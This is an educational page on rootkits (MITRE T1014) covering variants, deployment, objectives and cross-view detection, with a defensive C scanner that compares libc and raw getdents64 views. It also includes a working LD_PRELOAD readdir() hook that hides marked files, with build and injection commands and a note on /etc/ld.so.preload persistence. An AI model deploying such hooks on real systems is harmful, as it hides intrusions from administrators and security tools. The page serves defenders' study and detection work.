
Hide Artifacts: Rootkit

What: Hide Artifacts: Rootkit

Rootkits are malicious software whose defining purpose is to keep a foothold on a system while hiding their presence, and the presence of the attacker's other tooling, from users, administrators, and security controls. MITRE ATT&CK lists Rootkit (T1014) under the Defense Evasion tactic, alongside the Hide Artifacts techniques (T1564), because concealing the attacker's own artifacts on the host is the whole point of the technique.

How: Mechanisms and Techniques

Rootkits work by inserting themselves into a layer that other software relies on to see the system, and then lying at that layer. The main variants differ in how deep the hook is placed:

  1. Kernel-Level Rootkits: These run in kernel space, typically as a loadable kernel module or a malicious driver, so they have the same privileges as the operating system itself. They hide by patching system call handlers or kernel function pointers, unlinking their own process or module from the kernel's bookkeeping lists, or filtering the results the kernel returns to user space. Because the kernel is the layer every security tool on the host ultimately asks, nothing running on that host can fully trust its own view once the kernel is compromised.

  2. User-Level Rootkits: These operate in user space and intercept the library or API calls that programs use to inspect the system, altering what is returned. On Linux this is commonly done by preloading a shared library (via LD_PRELOAD or /etc/ld.so.preload) that overrides functions such as readdir() and fopen(); on Windows, by patching imported functions inside a process. They hook calls related to directory listing, process enumeration, or network sockets to hide specific files, processes, or connections. They are easier to build than kernel rootkits, but anything that bypasses the hooked layer, such as a raw system call, still sees the truth.

  3. Bootkit: A rootkit that infects the boot path, classically the Master Boot Record (MBR) or Volume Boot Record (VBR) on legacy BIOS systems and, on UEFI systems, the boot manager or other early-boot components, so that it runs before the operating system and can tamper with the kernel as it loads. Secure Boot and measured boot exist largely to close this window.

  4. Hardware/Firmware Rootkits: These live in firmware rather than on the OS disk: in the BIOS/UEFI firmware itself, or in the firmware of hard drives, network cards, or management controllers. They are difficult to detect from within the OS, and they survive the usual cleanup steps, including reinstalling the operating system or replacing the disk, because the compromised component is trusted again on every boot.
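The user-level hooking described in item 2, written out as an added example (this is an illustration for this page, not code from the page's author or from any real rootkit): a drop-in readdir() that silently drops every directory entry whose name begins with a made-up prefix, rk_. Built as a shared object and injected with LD_PRELOAD it sits between programs such as ls and libc; built as an ordinary executable, as here, the program's own definition shadows libc's in the same way, so the fixture shows the two views side by side. The prefix, the fixture directory and the helper names are assumptions for the demo.

```c
#define _GNU_SOURCE                 /* exposes RTLD_NEXT in <dlfcn.h> */
#include <dirent.h>
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifndef RTLD_NEXT
#define RTLD_NEXT ((void *) -1l)    /* glibc/musl value, in case the feature macro came too late */
#endif

/* Hypothetical naming convention for the demo: entries starting with this prefix are hidden. */
#define HIDE_PREFIX "rk_"

typedef struct dirent *(*readdir_fn)(DIR *);

/* Resolve the next readdir in link order, i.e. libc's real implementation. */
static readdir_fn real_readdir(void)
{
    static readdir_fn real;
    if (!real)
        real = (readdir_fn) dlsym(RTLD_NEXT, "readdir");
    return real;
}

/*
 * The hook. Same name and signature as libc's readdir, so every program that
 * lists a directory through libc (ls, find, file managers) calls this instead.
 * It pulls entries from the real readdir and drops the marked ones.
 */
struct dirent *readdir(DIR *dirp)
{
    readdir_fn real = real_readdir();
    struct dirent *e;
    if (!real)
        return NULL;
    while ((e = real(dirp)) != NULL) {
        if (strncmp(e->d_name, HIDE_PREFIX, sizeof HIDE_PREFIX - 1) != 0)
            return e;                /* ordinary entry: pass it through */
        /* marked entry: loop again, the caller never sees it */
    }
    return NULL;
}

/* Count the entries of a directory as seen through a given readdir implementation. */
static int count_entries(const char *path, readdir_fn rd)
{
    if (!rd)
        return -1;
    DIR *d = opendir(path);
    if (!d)
        return -1;
    int n = 0;
    while (rd(d) != NULL)
        n++;
    closedir(d);
    return n;
}

int entries_via_hook(const char *path) { return count_entries(path, readdir); }
int entries_via_libc(const char *path) { return count_entries(path, real_readdir()); }

/* Constructed fixture: a temp dir holding one ordinary file and one marked file. */
char *make_fixture(void)
{
    char *dir = strdup("/tmp/rootkit_demo_XXXXXX");
    if (!dir || !mkdtemp(dir)) { free(dir); return NULL; }
    const char *files[] = { "notes.txt", HIDE_PREFIX "implant.so" };
    for (int i = 0; i < 2; i++) {
        char path[512];
        snprintf(path, sizeof path, "%s/%s", dir, files[i]);
        FILE *f = fopen(path, "w");
        if (!f) { free(dir); return NULL; }
        fclose(f);
    }
    return dir;                      /* caller frees; the files stay for inspection */
}

int main(void)
{
    char *dir = make_fixture();
    if (!dir)
        return 1;
    /* ".", "..", notes.txt and rk_implant.so: libc reports 4, the hook reports 3 */
    printf("%s: libc sees %d entries, hooked readdir sees %d\n",
           dir, entries_via_libc(dir), entries_via_hook(dir));
    free(dir);
    return 0;
}
```

To use it the way a real preload rootkit would, build it as a library (gcc -shared -fPIC -o hook.so hook.c -ldl) and run LD_PRELOAD=./hook.so ls /tmp/rootkit_demo_XXXXXX against the fixture directory; the rk_ file disappears from the listing while ls /tmp/rootkit_demo_XXXXXX/rk_implant.so still opens it, because only readdir is hooked. Real preload rootkits hook a much longer list (readdir64, stat, fopen, the /proc walkers used for ps and netstat) and persist through /etc/ld.so.preload; a kernel-level rootkit applies the same filter one layer lower, at the getdents64 system call, which is why the user-level version is defeated by anything that bypasses libc.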

Where: Deployment and Execution

Installing a rootkit is rarely the first step of an intrusion: the kernel, boot, and firmware variants need administrative privileges, or a vulnerable signed driver, before they can load, so the rootkit usually follows an initial compromise gained through one of these vectors:

  • Phishing Attacks: Tricking users into executing malicious attachments or installers that drop the rootkit.
  • Exploitation: Abusing vulnerabilities in exposed software to gain code execution and elevate privileges, then installing the rootkit with those privileges.
  • Supply Chain Attacks: Compromising software updates or hardware components before they reach the target, so the rootkit arrives already trusted.
  • Physical Access: Using hardware interfaces (for example a debug port or a flash programmer) to write firmware- or hardware-based rootkits directly.

Once installed, rootkits typically reside:

  • Within kernel memory as modules or drivers.
  • As modified binaries or additional code within user-space applications.
  • Within device firmware, out of reach of antivirus software that only scans the file system.

Why: Objectives and Implications

The primary objective of deploying a rootkit is to maintain persistent, undetected access to a host machine. This allows attackers continuous control over compromised systems for various purposes:

  • Data Theft: Accessing sensitive information from filesystems without detection.
  • Surveillance: Monitoring user actions and network traffic covertly.
  • Resource Hijacking: Utilizing system resources for processes like cryptocurrency mining without user consent.
  • Further Attacks: Using compromised machines as pivot points for lateral movement within a network.

The implications of a rootkit infection are severe, not only because of the stealth but because a rootkit usually runs with the highest privileges the system offers. Detection and removal are correspondingly hard. Since any tool running on the compromised host gets its answers through the layer the rootkit controls, detection relies on cross-view comparisons (what libc reports against what the raw system call returns, what the guest OS reports against what a hypervisor or an offline image of the disk shows) and on memory and firmware analysis from a trusted environment such as a live boot medium. Removing a kernel, boot, or firmware rootkit usually means rebuilding the system from known-good media rather than cleaning it in place.
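One concrete form of the low-level, cross-view scanning described above, as an added example that is not from the page: it lists a directory twice, once through libc's readdir() (the layer a preload rootkit hooks) and once through the raw getdents64 system call, and reports entries present in the kernel's view but missing from libc's; it then applies the same idea to processes, brute-forcing the PID space with kill(pid, 0), which a rootkit that merely filters /proc cannot intercept. The entry cap, the state names and the output format are assumptions for the demo; on a clean system both counts come back zero.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

#define MAX_NAMES 1024              /* assumed cap on entries per directory */
#define NAME_LEN  256

/* Record layout returned by the raw getdents64 syscall (Linux kernel ABI). */
struct raw_dirent64 {
    unsigned long long d_ino;
    long long          d_off;
    unsigned short     d_reclen;
    unsigned char      d_type;
    char               d_name[];
};

/* View 1: libc's readdir() path, the layer a user-level rootkit hooks. */
static int names_via_libc(const char *path, char names[][NAME_LEN])
{
    DIR *d = opendir(path);
    if (!d) return -1;
    int n = 0;
    struct dirent *e;
    while (n < MAX_NAMES && (e = readdir(d)) != NULL)
        snprintf(names[n++], NAME_LEN, "%s", e->d_name);
    closedir(d);
    return n;
}

/* View 2: the same directory straight from the kernel, bypassing libc. */
static int names_via_syscall(const char *path, char names[][NAME_LEN])
{
    int fd = open(path, O_RDONLY | O_DIRECTORY);
    if (fd < 0) return -1;
    unsigned long long buf[1024];   /* 8 KiB, 8-byte aligned as the records are */
    char *p = (char *) buf;
    int n = 0;
    long got;
    while ((got = syscall(SYS_getdents64, fd, buf, sizeof buf)) > 0) {
        for (long off = 0; off < got && n < MAX_NAMES;) {
            struct raw_dirent64 *e = (struct raw_dirent64 *) (p + off);
            snprintf(names[n++], NAME_LEN, "%s", e->d_name);
            off += e->d_reclen;
        }
    }
    close(fd);
    return n;
}

/* Cross-view diff: entries the kernel reports that the libc view lacks. */
int hidden_entries(const char *path)
{
    static char libc_v[MAX_NAMES][NAME_LEN], raw_v[MAX_NAMES][NAME_LEN];
    int nl = names_via_libc(path, libc_v), nr = names_via_syscall(path, raw_v);
    if (nl < 0 || nr < 0) return -1;
    int hidden = 0;
    for (int i = 0; i < nr; i++) {
        int found = 0;
        for (int j = 0; j < nl && !found; j++)
            found = strcmp(libc_v[j], raw_v[i]) == 0;
        if (!found) { hidden++; printf("hidden from libc view: %s/%s\n", path, raw_v[i]); }
    }
    return hidden;
}

/* Process cross-view: a PID that answers kill(pid, 0) but is missing from the /proc listing. */
enum pid_state { PID_ABSENT, PID_VISIBLE, PID_THREAD, PID_HIDDEN };

static int listed_in_proc(pid_t pid)
{
    char want[32];
    snprintf(want, sizeof want, "%d", (int) pid);
    DIR *d = opendir("/proc");
    if (!d) return -1;
    int found = 0;
    struct dirent *e;
    while (!found && (e = readdir(d)) != NULL)
        found = strcmp(e->d_name, want) == 0;
    closedir(d);
    return found;
}

enum pid_state probe_pid(pid_t pid)
{
    if (kill(pid, 0) != 0 && errno != EPERM) return PID_ABSENT;   /* nobody answers */
    if (listed_in_proc(pid) == 1) return PID_VISIBLE;
    /* Threads answer kill() too but only their group leader is listed: check Tgid. */
    char path[64], line[128];
    int tgid = -1;
    snprintf(path, sizeof path, "/proc/%d/status", (int) pid);
    FILE *f = fopen(path, "r");
    if (f) {
        while (fgets(line, sizeof line, f))
            if (sscanf(line, "Tgid: %d", &tgid) == 1) break;
        fclose(f);
    }
    if (tgid != -1 && tgid != (int) pid) return PID_THREAD;       /* its leader gets its own turn */
    /* Re-probe so a process that merely exited in between is not reported. */
    if (kill(pid, 0) != 0 && errno != EPERM) return PID_ABSENT;
    return listed_in_proc(pid) == 1 ? PID_VISIBLE : PID_HIDDEN;
}

/* Brute-force the whole PID space; filtering /proc does not stop kill() from answering. */
int scan_hidden_pids(void)
{
    long pid_max = 32768;                    /* fallback if the sysctl is unreadable */
    FILE *f = fopen("/proc/sys/kernel/pid_max", "r");
    if (f) { if (fscanf(f, "%ld", &pid_max) != 1) pid_max = 32768; fclose(f); }
    int hidden = 0;
    for (long pid = 1; pid <= pid_max; pid++)
        if (probe_pid((pid_t) pid) == PID_HIDDEN) { hidden++; printf("hidden pid: %ld\n", pid); }
    return hidden;
}

int main(int argc, char **argv)
{
    const char *dir = argc > 1 ? argv[1] : "/";
    printf("%s: %d hidden entries\n%d hidden pids\n", dir, hidden_entries(dir), scan_hidden_pids());
    return 0;
}
```

Run it against a directory whose listing is being filtered by a preload hook and the raw-syscall view exposes the filtered names; run it on a box whose /proc is being filtered and the PID scan names the hidden process. The limits are the point of the page: both checks trust the kernel, so a kernel-level rootkit that filters getdents64 itself, or hides the task from the kernel's own lists, passes both. Against that class the comparison has to be made from outside the host, with a hypervisor view, a memory image, or an offline copy of the disk and firmware.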

In conclusion, understanding where the Rootkit technique sits in MITRE's framework helps defenders plan accordingly: assume a compromised host cannot be trusted to report on itself, collect evidence from outside the host wherever possible, and treat prevention (privilege control, driver and boot integrity, firmware protection) as the primary defense against malware built to integrate this deeply while staying hidden from conventional detection.